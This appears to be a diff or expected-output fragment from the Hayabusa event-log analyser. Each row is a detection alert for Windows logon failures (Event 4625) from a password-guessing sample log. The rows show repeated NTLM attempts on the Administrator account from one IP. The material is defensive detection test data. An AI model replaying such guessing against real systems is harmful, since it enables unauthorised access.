+2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW8VghddPwP5C6dO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGZuyZ0LErZ3Sgty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bT1xrvfndr5R8Vg3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H6RFTZVJE9remzqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzjwzORvTwuBPLEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMjSFfZ88BV2sT1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SnpCLI2EJZRhr3vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztEU2m9SwbqgSdVY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHO1X0zwmoWotcM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ck429g2Cs4siVVq4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9txH9zA3oY885iTi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: alIIEzE2rTrNtOtr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ww4BXLwhaNxOttgo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GPdz2pjDocMWqctT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOm1i2a20IDNmIu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ukSrSu516dHlHQ94 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: grdERCipFl1FMB1o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmpuUsIRbp57KCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VWLuqrOQSQuqcwUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eEASOf84AX8ow4vf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcgNTGlESh6FytEY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeVo7D3oBsdUMHfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mLqSB2yGMksaBgUS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7qRzzpL2YhfIGSD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvE5tMw3MjDhA0Fe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXuNgOkIzvKIuJki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q8vPHEXrxVpUyKZq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vk7sh6VM7AZQv2in | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jurt5hAg90y1VWdT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlrPbTbJRTxFakiv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ5cWmYL8weCCRT0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0v2Emgn7BD1STZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MJppWxAiNJ4D0s2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHVcJEec3y6v9gIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 68RKE5dS8X5Px2gR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Np8mTqhr7QasXk1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhpDNDIPVyRlfej8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZtmxGeLj25VSUcm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SPN8w8WghBYzChZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 36hmbCuKxF9Dt4vR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TALpRirdvB9a8y6M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvEvwFeXGOgycZvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ppxeOgZNua2Ieuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n4U5XdQu1YtSat7J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MN0OfYE6vPgqyyZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmfCPIdiTH9gG2qZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UtcHAxmfDL9C9uZa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TX62kMSJqq0Lv8o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hA20OdabfW5DMphV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ex5Awm2zaVhvAMTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I72BOMPQHyyP374g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4al5pUa4mKfbL734 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UNHH8ESWZ4Rx6K93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ay3XdxRFXXaD4Ib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PgyG7spUL5glkVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6D6PVnrIODwtcIXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cRZgqmQbL3l7KTke | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HYGKv2l0s9XZnqkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wX2R08dxiEcRNzcM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcN791fdSHwaWuBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CRObbkQsykQma2Tn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v4UvU7VglbA2p0Z9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ODkwHD0dwGaWhVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bPQ5GsX1UUXA6ws | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bvRQ0dVaLawXoo2O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjxwDdOYBDDSJGun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czlTDa1F6edSUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mrtgv5HAqRuelEvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfny9Y4SGRZTUXi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hdhoRgnyj4JPpN2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K4Qclkpq5ZMKmdCB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GdZSrcqmfGBfAVy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XA7eJrFopzOb3YQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2XoSwawv7Ji26GQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
